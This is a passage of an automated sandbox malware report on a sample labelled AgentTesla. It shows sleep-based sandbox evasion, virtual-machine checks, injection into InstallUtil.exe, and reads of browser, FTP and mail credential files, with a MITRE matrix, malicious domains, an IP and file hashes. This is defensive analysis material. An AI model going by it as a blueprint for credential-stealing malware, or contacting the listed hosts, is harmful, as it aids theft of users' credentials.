                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599313s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599094s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598969s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598235s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -598110s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597985s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597235s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -597110s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596985s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596621s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596391s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596266s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596157s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -596032s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595907s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595797s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595688s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595563s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595438s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595313s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595188s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -595078s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594969s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594844s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -594360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Thread delayed: delay time: 30000
                        Source: Xc501VOacR.exe, 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Xc501VOacR.exe, 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                        Source: Xc501VOacR.exe, 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q#SOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: InstallUtil.exe, 00000004.00000002.3286884702.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D52008
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Users\user\Desktop\Xc501VOacR.exe VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fead3a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fead3a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3f9778a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fc126a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.4068598.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fc126a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fead3a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fead3a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3f9778a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fc126a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.4068598.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3fc126a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3924, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

MITRE ATT&CK Matrix

The number in parentheses after a technique is the count of matched signatures for that technique.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (1) | Windows Management Instrumentation (121) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping (2) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (11) | Encrypted Channel (1) | Exfiltration Over Alternative Protocol (1) | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Valid Accounts (1) | Valid Accounts (1) | Deobfuscate/Decode Files or Information (1) | Credentials in Registry (1) | System Information Discovery (24) | Remote Desktop Protocol | Data from Local System (2) | Non-Standard Port (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Access Token Manipulation (1) | Obfuscated Files or Information (2) | Security Account Manager | Security Software Discovery (111) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Process Injection (311) | Software Packing (12) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (11) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Virtualization/Sandbox Evasion (141) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (1) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (141) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (311) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Hidden Files and Directories (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

Source | Detection | Scanner | Label
Xc501VOacR.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Xc501VOacR.exe | 100% | Avira | TR/AD.Nekark.myuaf
Xc501VOacR.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://ftp.aminhacorretora.com.br | 100% | Avira URL Cloud | malware
http://aminhacorretora.com.br | 100% | Avira URL Cloud | malware
http://ns.adobe.c0/ | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
aminhacorretora.com.br | 162.241.203.30 | true | true | | unknown
ftp.aminhacorretora.com.br | unknown | unknown | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://aminhacorretora.com.br | InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ftp.aminhacorretora.com.br | InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.adobe.c0/ | Xc501VOacR.exe, 00000000.00000002.2704584943.00000000061D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.203.30 | aminhacorretora.com.br | United States | 26337 | OIS1US | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569282
Start date and time: 2024-12-05 17:21:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Xc501VOacR.exe (renamed because the original name is a hash value)
Original Sample Name: 61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 186
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Xc501VOacR.exe

Time | Type | Description
11:22:21 | API Interceptor | 218x Sleep call for process: Xc501VOacR.exe modified
11:23:33 | API Interceptor | 30184x Sleep call for process: InstallUtil.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.241.203.30 | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | nossoplayer.me/admin/
162.241.203.30 | RjGM2z2Z3gVHbRl.exe | malicious | FormBook | www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
162.241.203.30 | PI5102295.exe | malicious | FormBook | www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
162.241.203.30 | SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exe | malicious | FormBook | www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
162.241.203.30 | ZsFMADRfZB.exe | malicious | FormBook | www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
162.241.203.30 | SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exe | malicious | FormBook | www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
162.241.203.30 | SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exe | malicious | FormBook | www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
162.241.203.30 | SKMB610952.js | malicious | FormBook | www.enriquepimentel.site/k056/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
aminhacorretora.com.br | Hangarskibenes.exe | malicious | GuLoader | 162.241.203.30

Match | Associated Sample Name / URL | Detection | Threat Name | Context
OIS1US | umVoLahqZn.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | tTXQS6DONV.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | dY1ZxYJOz7.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | i9QKJCpVZJ.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 192.185.147.100
OIS1US | Documents.exe | malicious | FormBook, PureLog Stealer | 192.185.147.100
OIS1US | https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627 | malicious | HTMLPhisher | 162.241.71.126
OIS1US | http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm | malicious | Unknown | 162.241.71.126
OIS1US | https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com | malicious | Unknown | 162.241.71.126
OIS1US | Isabella County Emergency Management-protected.pdf | malicious | HTMLPhisher | 162.241.71.126
                              No context
                              No context

Process: C:\Users\user\Desktop\Xc501VOacR.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
MD5: 8275047EA04782E18195CE5F2F076225
SHA1: 86FE553781E50EE2493A6D54A2F329FF94AD0DEE
SHA-256: 302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
